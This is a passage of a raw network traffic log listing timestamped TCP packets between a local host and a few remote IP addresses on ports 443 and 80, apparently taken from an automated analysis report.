                                                                                                                                                  Nov 18, 2024 18:21:56.888724089 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.888751030 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.888787985 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:56.888787985 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:56.929316044 CET443491675.45.108.48192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.929404020 CET443491675.45.108.48192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.929768085 CET49167443192.168.2.225.45.108.48
                                                                                                                                                  Nov 18, 2024 18:21:56.929889917 CET49167443192.168.2.225.45.108.48
                                                                                                                                                  Nov 18, 2024 18:21:56.929913998 CET443491675.45.108.48192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.002305984 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.002320051 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.002460957 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.002480984 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.002733946 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.002772093 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.002779007 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.002791882 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.002914906 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.004489899 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.004499912 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.004553080 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.004559994 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.005136967 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.005186081 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.005192995 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.118695021 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.118765116 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.118781090 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.119333029 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.119342089 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.119368076 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.119385958 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.119395971 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.119952917 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.120076895 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.120085001 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.120120049 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.120136976 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.120167971 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.121108055 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.121114969 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.121140957 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.121164083 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.121181965 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.236038923 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.236052990 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.236100912 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.236115932 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.236125946 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.237061024 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.237070084 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.237127066 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.237135887 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.238018036 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.238079071 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.238086939 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.245805979 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.245884895 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.245897055 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.275158882 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.353210926 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.353224039 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.353285074 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.353302956 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.354331970 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.354365110 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.354392052 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.354402065 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.354479074 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.354852915 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.355460882 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.355468988 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.355516911 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.357120037 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.357196093 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.357208014 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.399226904 CET49168443192.168.2.225.45.108.48
                                                                                                                                                  Nov 18, 2024 18:21:57.399270058 CET443491685.45.108.48192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.399362087 CET49168443192.168.2.225.45.108.48
                                                                                                                                                  Nov 18, 2024 18:21:57.412029982 CET4916980192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:57.415780067 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.415896893 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.415911913 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.417022943 CET8049169107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.417095900 CET4916980192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:57.428545952 CET49170443192.168.2.225.45.108.48
                                                                                                                                                  Nov 18, 2024 18:21:57.428579092 CET443491705.45.108.48192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.428622961 CET49170443192.168.2.225.45.108.48
                                                                                                                                                  Nov 18, 2024 18:21:57.461646080 CET49170443192.168.2.225.45.108.48
                                                                                                                                                  Nov 18, 2024 18:21:57.461668968 CET443491705.45.108.48192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.462908030 CET49168443192.168.2.225.45.108.48
                                                                                                                                                  Nov 18, 2024 18:21:57.462919950 CET443491685.45.108.48192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.471297979 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.471309900 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.471347094 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.471401930 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.471412897 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.471452951 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.472223997 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.472234011 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.472256899 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.472289085 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.472315073 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.472817898 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.472825050 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.472842932 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.472875118 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.472894907 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.473623991 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.473630905 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.473680019 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.473686934 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.532982111 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.533031940 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.533061028 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.533082008 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.533126116 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.589560986 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.589574099 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.589612007 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.589642048 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.589662075 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.590492010 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.590500116 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.590565920 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.590579033 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.591248989 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.591257095 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.591305971 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.591324091 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.591839075 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.591869116 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.591897964 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.591906071 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.591943979 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.650146008 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.650175095 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.650311947 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.650352001 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.671626091 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.706455946 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.706469059 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.706568003 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.706593037 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.706922054 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.706974983 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.706983089 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.708545923 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.708594084 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.708607912 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.708630085 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.708648920 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.708657980 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.708657980 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.708697081 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.708719015 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.709834099 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.709894896 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.709909916 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.824109077 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.824171066 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.824201107 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.825017929 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.825026989 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.825064898 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.825067997 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.825084925 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.825110912 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.825932026 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.825939894 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.825974941 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.825989962 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.826816082 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.826826096 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.826869965 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.826884985 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.827554941 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.827585936 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.827600002 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.827606916 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.827636957 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.828367949 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.828377008 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.828685999 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.828691959 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.941683054 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.941867113 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.941891909 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.942627907 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.942636013 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.942684889 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.942702055 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.942712069 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.942749023 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.943218946 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.943228006 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.943255901 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.943299055 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.944585085 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.944593906 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.944621086 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.944642067 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.944664001 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.945547104 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.945555925 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.945580006 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.945600033 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.945614100 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.945647955 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.970227957 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.985450983 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.985465050 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.985541105 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:57.985558987 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.059350967 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.059376001 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.059408903 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:58.059434891 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.059448004 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:58.060218096 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.060228109 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.060261965 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.060267925 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:58.060286045 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.060332060 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:58.060869932 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.060878038 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.060902119 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.060920954 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:58.060945988 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:58.061589003 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.061597109 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.061635017 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:58.061726093 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:58.061733961 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.062341928 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.062374115 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.062391996 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:58.062398911 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.062436104 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:58.102807999 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.102823019 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.102890015 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:58.102916002 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.187037945 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.187110901 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:58.187129021 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.187658072 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.187666893 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.187694073 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.187707901 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:58.187717915 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.187725067 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:58.187757015 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:58.189197063 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.189203978 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.189230919 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.189240932 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:58.189254999 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:58.189277887 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:58.190119028 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.190125942 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.190172911 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:58.190172911 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:58.190181971 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.191031933 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.191092014 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:58.191098928 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.191865921 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.191914082 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:58.191920996 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.294076920 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.294249058 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:58.294306993 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.294852018 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.294858932 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.294919014 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.294924021 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:58.294939041 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.294981003 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:58.295562983 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.295571089 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.295599937 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.295620918 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:58.295636892 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:58.296626091 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.296633959 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.296660900 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.296681881 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:58.296694040 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:58.297384024 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.297390938 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.297446966 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:58.297456980 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.298305988 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.298312902 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.298367977 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:58.298378944 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.299361944 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:58.299398899 CET44349166142.215.209.78192.168.2.22
